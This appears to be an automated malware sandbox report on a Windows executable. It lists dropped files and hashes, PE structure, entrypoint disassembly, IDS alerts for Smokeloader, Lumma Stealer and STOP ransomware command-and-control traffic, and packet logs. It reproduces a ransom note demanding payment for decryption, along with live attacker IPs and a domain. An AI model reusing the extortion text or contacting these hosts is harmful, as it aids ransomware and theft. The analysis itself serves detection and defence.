                                                                                                                                                                                                                                      Preview:<?xml*w.b.y 8...l.Y......#...$_iV.c.#..Xz.a.A.g..EjA.....8...z..y....(...;....x.4X.rx+mZ..M....z.B-...?.1.a..~c.<..o5j..-......?:)&.q..p.5.g....J.$...Ve.C_.&...m.@....)..m...2U4..v...6W%RX...|.XS.F.E...Wkz........a......w..^....N.C......e..pH.u.BP...`....a.9O...l ..}._.:.... M+;..6.`...bZc...K.I...........v:..x#....~p.".....c$7..&..w......|@..g......l{.\BWT./. .dN....oGD...$7f.T.........k6|....F.I.K....N..T..G...TY|..$H.$C...|...y...j.....<..Vi.U!n..'-TE.........1......-...n'x.=m....}Z.Z=.n........B...,..(+.EsNqW..y...J..Mh..P....U,.....*..q.#m..rD.{....t..]=..r(...N..Ca..;..,}..p.0$d..q....W3...e~. ...P.z.HWR.T..,.'G.z.G^..J..|..eoO...o2_)......y.FCL....\...s....~^.Qg....}.5..V/;..S.]e..g...u.......\..dZ..n.?{LA...jh..@.....O.~.......^.S..iX.... i..14.&.h....7.......FH\_ .|.\...d0...[._..k.v.XM.M.h.OX.a@ji\.......[-3.N@-.&\|z...N..7.*..:.IGj(.!.....D...h..lL.d.b...T$C..q..F,.<..Y.....y(.XQ..[.}W-....i....A..k...hH_....T.6.......+.c.......g

                                                                                                                                                                                                                                      C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1193
                                                                                                                                                                                                                                      Entropy (8bit):7.835357099902493
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:peXi8HQ6gxuraadwpmkGheAsIrxjvEzXYpQ8eo/G0F42FZEuqGDALXt05wHiiTkX:syqQLxG2ZIh1rEUhe2LZP58L+5ciD
                                                                                                                                                                                                                                      MD5:1B6769383183F6BF775F8D2A2C4AD606
                                                                                                                                                                                                                                      SHA1:84265CD4E320210A09DB1116E4AF42E7DEDCC3F8
                                                                                                                                                                                                                                      SHA-256:C514D4D37296D8C94700C6DB3EFD9ED1D2953B5BC8B447FB67A57EA841CE5D0A
                                                                                                                                                                                                                                      SHA-512:A01E7F5B3E3592060E70C25DFF5C7E041A3B61524E7CBF2E0FDBEE23F422D1FA9F7FE309C96829751729EC747784C542F5D455CC026B78536C18DE686C3216B3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml*w.b.y 8...l.Y......#...$_iV.c.#..Xz.a.A.g..EjA.....8...z..y....(...;....x.4X.rx+mZ..M....z.B-...?.1.a..~c.<..o5j..-......?:)&.q..p.5.g....J.$...Ve.C_.&...m.@....)..m...2U4..v...6W%RX...|.XS.F.E...Wkz........a......w..^....N.C......e..pH.u.BP...`....a.9O...l ..}._.:.... M+;..6.`...bZc...K.I...........v:..x#....~p.".....c$7..&..w......|@..g......l{.\BWT./. .dN....oGD...$7f.T.........k6|....F.I.K....N..T..G...TY|..$H.$C...|...y...j.....<..Vi.U!n..'-TE.........1......-...n'x.=m....}Z.Z=.n........B...,..(+.EsNqW..y...J..Mh..P....U,.....*..q.#m..rD.{....t..]=..r(...N..Ca..;..,}..p.0$d..q....W3...e~. ...P.z.HWR.T..,.'G.z.G^..J..|..eoO...o2_)......y.FCL....\...s....~^.Qg....}.5..V/;..S.]e..g...u.......\..dZ..n.?{LA...jh..@.....O.~.......^.S..iX.... i..14.&.h....7.......FH\_ .|.\...d0...[._..k.v.XM.M.h.OX.a@ji\.......[-3.N@-.&\|z...N..7.*..:.IGj(.!.....D...h..lL.d.b...T$C..q..F,.<..Y.....y(.XQ..[.}W-....i....A..k...hH_....T.6.......+.c.......g

                                                                                                                                                                                                                                      C:\Users\user\_README.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1381
                                                                                                                                                                                                                                      Entropy (8bit):4.900414759348837
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNBamFRqrs6314kA+GT/kF5M2/kJw3RJv:WZHfv0pfNAU5WEYNBaPs41rDGT0f/kiN
                                                                                                                                                                                                                                      MD5:743DE536D4049809F770A31EBDF940F0
                                                                                                                                                                                                                                      SHA1:EF9581CB6E28BE4F601D51BA72AE4B2CAE50088C
                                                                                                                                                                                                                                      SHA-256:BA953BD249D95AAB22C35D969A191DBE4568AEB6A7612EE747489C4132F208B0
                                                                                                                                                                                                                                      SHA-512:793B1BE5D41D03C32C20DBB055E50B7E7295123E7EDD9F2BD81C4A800502FD8D3EF2AE6BA83C0E0AED037F20993BD9DD2695AB6E2935FB870A414667A531F9B2
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                                                                                                                      C:\_README.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1381
                                                                                                                                                                                                                                      Entropy (8bit):4.900414759348837
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNBamFRqrs6314kA+GT/kF5M2/kJw3RJv:WZHfv0pfNAU5WEYNBaPs41rDGT0f/kiN
                                                                                                                                                                                                                                      MD5:743DE536D4049809F770A31EBDF940F0
                                                                                                                                                                                                                                      SHA1:EF9581CB6E28BE4F601D51BA72AE4B2CAE50088C
                                                                                                                                                                                                                                      SHA-256:BA953BD249D95AAB22C35D969A191DBE4568AEB6A7612EE747489C4132F208B0
                                                                                                                                                                                                                                      SHA-512:793B1BE5D41D03C32C20DBB055E50B7E7295123E7EDD9F2BD81C4A800502FD8D3EF2AE6BA83C0E0AED037F20993BD9DD2695AB6E2935FB870A414667A531F9B2
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):5.959947496307528
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                                      • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                      File name:6uVlPQSJ4e.exe
                                                                                                                                                                                                                                      File size:265'216 bytes
                                                                                                                                                                                                                                      MD5:b05a74505fa03339578dff002ba57c69
                                                                                                                                                                                                                                      SHA1:b9851e84dbd2c8b2ecccb30452ddccb0496ef974
                                                                                                                                                                                                                                      SHA256:e9839a31cca5038608b57f6e13e75f43aa845a2f892c917a77b3c4f0bcc35c7e
                                                                                                                                                                                                                                      SHA512:616337efd4b6a84f0590226b52d8c7398723afe43bb1fc879089a7474b7fd8949e16353bb4ff713da4295dbc4885d5eb34d9483d7441b726592371bb8f285dd3
                                                                                                                                                                                                                                      SSDEEP:3072:NCEgl6HLc0iImEkhg569+wjkabBB2n2qr4j54wCxe9yFfqdwiB9ez/WnQEbK3Zk:NsUrc06Fue/kZr4j5vwbb0WWnQEbe
                                                                                                                                                                                                                                      TLSH:9244CE1176E0C474F6F306325C349A85177FFDB39E758A9B3398A66E2C712C08A26763
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...2[.c...................

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:63796de971436e0f

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x403f27
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x638C5B32 [Sun Dec 4 08:32:50 2022 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                      Import Hash:73a705984e6e7b2e05c030d50f71c6c1

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007FDAA8808C65h
                                                                                                                                                                                                                                      jmp 00007FDAA8803D85h
                                                                                                                                                                                                                                      push 00000014h
                                                                                                                                                                                                                                      push 00415D28h
                                                                                                                                                                                                                                      call 00007FDAA8806DD8h
                                                                                                                                                                                                                                      call 00007FDAA8807D5Eh
                                                                                                                                                                                                                                      movzx esi, ax
                                                                                                                                                                                                                                      push 00000002h
                                                                                                                                                                                                                                      call 00007FDAA8808BF8h
                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                                                                                                                      je 00007FDAA8803D86h
                                                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                                                      jmp 00007FDAA8803DB5h
                                                                                                                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                                                                                      jne 00007FDAA8803D6Dh
                                                                                                                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                                                                                                                      jne 00007FDAA8803D5Fh
                                                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                                                                                      jbe 00007FDAA8803D8Bh
                                                                                                                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                                                                                      setne bl
                                                                                                                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                                      call 00007FDAA8808885h
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      jne 00007FDAA8803D8Ah
                                                                                                                                                                                                                                      push 0000001Ch
                                                                                                                                                                                                                                      call 00007FDAA8803E61h
                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                      call 00007FDAA8805F22h
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      jne 00007FDAA8803D8Ah
                                                                                                                                                                                                                                      push 00000010h
                                                                                                                                                                                                                                      call 00007FDAA8803E50h
                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                      call 00007FDAA8807C26h
                                                                                                                                                                                                                                      and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                      call 00007FDAA88074EBh
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      jns 00007FDAA8803D8Ah
                                                                                                                                                                                                                                      push 0000001Bh
                                                                                                                                                                                                                                      call 00007FDAA8803E36h
                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                      call dword ptr [004100CCh]
                                                                                                                                                                                                                                      mov dword ptr [00AE1308h], eax
                                                                                                                                                                                                                                      call 00007FDAA8808C4Ch
                                                                                                                                                                                                                                      mov dword ptr [0043ABA0h], eax
                                                                                                                                                                                                                                      call 00007FDAA8808849h
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      jns 00007FDAA8803D8Ah

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x161140x50.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e20000x79c8.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x101f00x38.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x156100x40.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x100000x190.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000xe5600xe60068d4f279ee8920f9b5d6294b9a22b393False0.6033118206521739data6.701521277790921IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rdata0x100000x6a420x6c007f6734052c8635d7952386a25672fa5cFalse0.3851996527777778data4.702990319759664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x170000x6ca3200x23c00b2e639af362d67d710f0cdeaae493b2eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x6e20000x79c80x7a00641b3f9c6031da33c0fdc8e7a2af4bfdFalse0.41800076844262296data4.42437244867918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      BIMEPEJIHUCAFUYAJIYEWUJORE0x6e55880x9e7ASCII text, with very long lines (2535), with no line terminatorsRomanianRomania0.6055226824457594
                                                                                                                                                                                                                                      RT_CURSOR0x6e5f700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                                                                                                                                                      RT_CURSOR0x6e6e180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                                                                                                                                                      RT_CURSOR0x6e76c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                                                                                                                                                      RT_CURSOR0x6e7c580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                                                                                                                                                                      RT_CURSOR0x6e7d880xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                                                                                                                                                                      RT_ICON0x6e24800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.532258064516129
                                                                                                                                                                                                                                      RT_ICON0x6e2b480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4101659751037344
                                                                                                                                                                                                                                      RT_ICON0x6e50f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.449468085106383
                                                                                                                                                                                                                                      RT_STRING0x6e80480x446dataRomanianRomania0.4424131627056673
                                                                                                                                                                                                                                      RT_STRING0x6e84900x2c4dataRomanianRomania0.4858757062146893
                                                                                                                                                                                                                                      RT_STRING0x6e87580x4e0dataRomanianRomania0.45592948717948717
                                                                                                                                                                                                                                      RT_STRING0x6e8c380x5e0dataRomanianRomania0.42819148936170215
                                                                                                                                                                                                                                      RT_STRING0x6e92180x58cdataRomanianRomania0.44366197183098594
                                                                                                                                                                                                                                      RT_STRING0x6e97a80x220dataRomanianRomania0.4944852941176471
                                                                                                                                                                                                                                      RT_GROUP_CURSOR0x6e7c280x30data0.9375
                                                                                                                                                                                                                                      RT_GROUP_CURSOR0x6e7e380x22data1.0588235294117647
                                                                                                                                                                                                                                      RT_GROUP_ICON0x6e55580x30dataRomanianRomania0.9375
                                                                                                                                                                                                                                      RT_VERSION0x6e7e600x1e8data0.5532786885245902

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      KERNEL32.dllReadConsoleA, GetCurrentProcess, GetTickCount, GetConsoleAliasesLengthA, GetWindowsDirectoryA, GlobalAlloc, SetCommConfig, GetLocaleInfoW, GetSystemPowerStatus, GetConsoleAliasExesLengthW, GetVersionExW, FindNextVolumeW, GetConsoleAliasW, WriteConsoleW, CreateFileW, GetEnvironmentVariableA, ExitThread, GetHandleInformation, GetLastError, GetProcAddress, InterlockedIncrement, PeekConsoleInputW, RemoveDirectoryA, LoadLibraryA, SetConsoleCtrlHandler, GetNumberFormatW, SetFileApisToANSI, QueryDosDeviceW, GlobalFindAtomW, GetModuleFileNameA, FindFirstVolumeMountPointA, VirtualProtect, GetCurrentDirectoryA, _lopen, GetCurrentProcessId, ResetWriteWatch, GetVolumeInformationW, OutputDebugStringW, HeapReAlloc, SetStdHandle, LCMapStringW, FindResourceW, MultiByteToWideChar, EncodePointer, DecodePointer, ReadFile, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, HeapFree, SetFilePointerEx, GetStdHandle, GetFileType, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, GetModuleFileNameW, LoadLibraryExW, HeapAlloc, GetProcessHeap, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, CloseHandle
                                                                                                                                                                                                                                      USER32.dllChangeMenuA, DrawFrameControl, CharUpperBuffW
                                                                                                                                                                                                                                      ADVAPI32.dllReadEventLogA

                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                      RomanianRomania

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      03/28/24-17:51:24.785698TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972580192.168.2.681.94.159.197
                                                                                                                                                                                                                                      03/28/24-17:51:07.691083TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      03/28/24-17:51:22.652702TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49722443192.168.2.6104.21.94.2
                                                                                                                                                                                                                                      03/28/24-17:51:25.973948TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972880192.168.2.681.94.159.197
                                                                                                                                                                                                                                      03/28/24-17:51:12.395102TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download804971678.89.158.42192.168.2.6
                                                                                                                                                                                                                                      03/28/24-17:51:36.220237TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      03/28/24-17:51:36.220237TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      03/28/24-17:51:07.691083TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      03/28/24-17:51:30.590162TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973580192.168.2.681.94.159.197
                                                                                                                                                                                                                                      03/28/24-17:51:12.067143TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971080192.168.2.681.94.159.197
                                                                                                                                                                                                                                      03/28/24-17:51:12.423136TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download804971778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      03/28/24-17:51:26.054274TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49729443192.168.2.6104.21.94.2
                                                                                                                                                                                                                                      03/28/24-17:51:23.807369TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49724443192.168.2.6104.21.94.2
                                                                                                                                                                                                                                      03/28/24-17:51:24.963150TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49726443192.168.2.6104.21.94.2
                                                                                                                                                                                                                                      03/28/24-17:51:27.964579TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49732443192.168.2.6104.21.94.2
                                                                                                                                                                                                                                      03/28/24-17:50:16.070020TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      03/28/24-17:51:22.958626TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972080192.168.2.681.94.159.197
                                                                                                                                                                                                                                      03/28/24-17:51:11.871249TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4971780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      03/28/24-17:51:21.787623UDP2050741ET TROJAN Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop)5774553192.168.2.61.1.1.1
                                                                                                                                                                                                                                      03/28/24-17:51:30.049750TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49734443192.168.2.6104.21.94.2
                                                                                                                                                                                                                                      03/28/24-17:51:21.904291TCP2050742ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)49721443192.168.2.6104.21.94.2

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.240968943 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.464796066 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.467139959 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.467303991 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.467319965 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.691488981 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.746627092 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.750009060 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.751002073 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.973895073 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.974646091 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.992113113 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.994582891 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.994617939 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:13.218430996 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:13.218451977 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:13.234375000 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:13.236745119 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:13.236773014 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:13.462549925 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.514434099 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.559628963 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.582353115 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.582379103 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.807821035 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.823796988 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.836905003 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.836930990 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.063735962 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.081722021 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.084191084 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.084191084 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.311872959 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.311968088 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.331357002 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.333734035 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.333734035 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.557298899 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.557377100 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.573074102 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.575876951 CET4970780192.168.2.681.94.159.197
